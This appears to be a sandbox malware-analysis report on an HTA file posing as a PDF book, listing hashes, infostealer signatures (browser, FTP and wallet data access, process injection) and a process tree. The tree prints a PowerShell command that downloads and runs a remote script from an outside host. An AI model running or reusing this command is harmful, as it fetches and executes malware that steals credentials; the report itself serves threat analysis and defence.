Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
19-04-2024 17:32
Static task
static1
General
-
Target
Book_PDF_a4_id_456543243432.hta
-
Size
46KB
-
MD5
5fbdd6357b961e941acd3c06ba2e867e
-
SHA1
ac1f9b5ffd9c6fa8790bf235f73bd53f699c527b
-
SHA256
f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17
-
SHA512
c63211263355c854c19964c37cd9857e08a90a694e087bfe6e5c1d35cc579ae75b9e5c5279172c8b24ce925a3476408ded33a32d09f7cc5b820e0cbd1dbb2907
-
SSDEEP
768:2bang59+ttT+fEV8yEH445wBodvJdgg6i1UY8o53YH:2baXLWEXEp5wcdgziK/H
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 436 740 powershell.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 14 436 powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 436 powershell.exe 436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 436 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
powershell.execsc.exedescription pid process target process PID 436 wrote to memory of 2124 436 powershell.exe csc.exe PID 436 wrote to memory of 2124 436 powershell.exe csc.exe PID 2124 wrote to memory of 3676 2124 csc.exe cvtres.exe PID 2124 wrote to memory of 3676 2124 csc.exe cvtres.exe PID 436 wrote to memory of 2932 436 powershell.exe RegAsm.exe PID 436 wrote to memory of 2932 436 powershell.exe RegAsm.exe PID 436 wrote to memory of 2932 436 powershell.exe RegAsm.exe PID 436 wrote to memory of 2932 436 powershell.exe RegAsm.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Book_PDF_a4_id_456543243432.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵PID:2876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\va3syipp\va3syipp.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37AA.tmp" "c:\Users\Admin\AppData\Local\Temp\va3syipp\CSC8904E7638F2F4BA6811C6441F9AAA635.TMP"3⤵PID:3676
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe2⤵PID:2932
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD550b4b2f0b8ab4b53088297851b7e2f10
SHA1c3a4a5c9997490e667687ecbb922498b4b4fbe74
SHA256ce9fe0c5e1f6294d48cb1dc12bd4033d3d61a95b12455cd188095203eddd86cf
SHA5126ed843ba27df8531f079e9960d6e50242faaa288ee34391ab9c587307e9795cdd316d84c78294538740ffb0de4817102bcd241e2e800369ae7ab31193ff30016
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5c7728e7824c0a8099501421590e44d56
SHA19fdf508c3aba8a5e556ebe464b03216c9b4fab97
SHA256e997b9d1ef2cc7b9e67a982175cc0a7594dbd8b5301a88d5f9d791847e2eca2f
SHA51224ef626859ad015c9a64a396f4d7175fc18c03d1363e32e174a95e06e9009c421e842b14ae81e1d55f4c0c5f331a11b7f6eb5994d54c5df53bc41080001a7dad
-
Filesize
652B
MD54a652ecd36686d221cd8d81f6de0b662
SHA1c32fed75f95abb07b54f5a0c1737222007bd9af3
SHA256056e1c2998728b5d3834d5ba4310208d8659a3c3a958cfa0ff6239d1b168248e
SHA512f9cee8d4f9456524f0c513aeb34924c38c7de611938379aee96f2568d148957780a1754561bd5f30d90ade0a24d251a7253793de53a41bd5c06b4a9287e5bdbe
-
Filesize
302B
MD5536c07d095670c7d6cf3045ff8764784
SHA1bcc7d23eeae1ebdf4ee06434ef24da592580f488
SHA256c4efd053c4ad51475e24c2c6d2ceef9ff22e936c4242c04e562de675ef27e800
SHA51260efa933633ce72479ac28bfa36daa9866b9d58645401cf93b2beeedc84bdb88fb944bd35cb86eaf30b4c16c3cdc298783213600fae1b9faa8a08b7a41691fdf
-
Filesize
369B
MD59bd92d95b0fd85de64a267d66d5abc16
SHA11e9d4ac55955907ba0e81109e5da6e7c35939814
SHA256fe9a148a5be5d3869767782a20ae2db0bd80610fbaf1e2063e0a209824183d66
SHA5121030d5b7de1b1494dd076e3dc1ef0896436028bc634071cdafed776f9e3bbd19981d3335b95d51c6be6e8fd5a5357e8d5d45f94b0f82d84a65e1906981b75515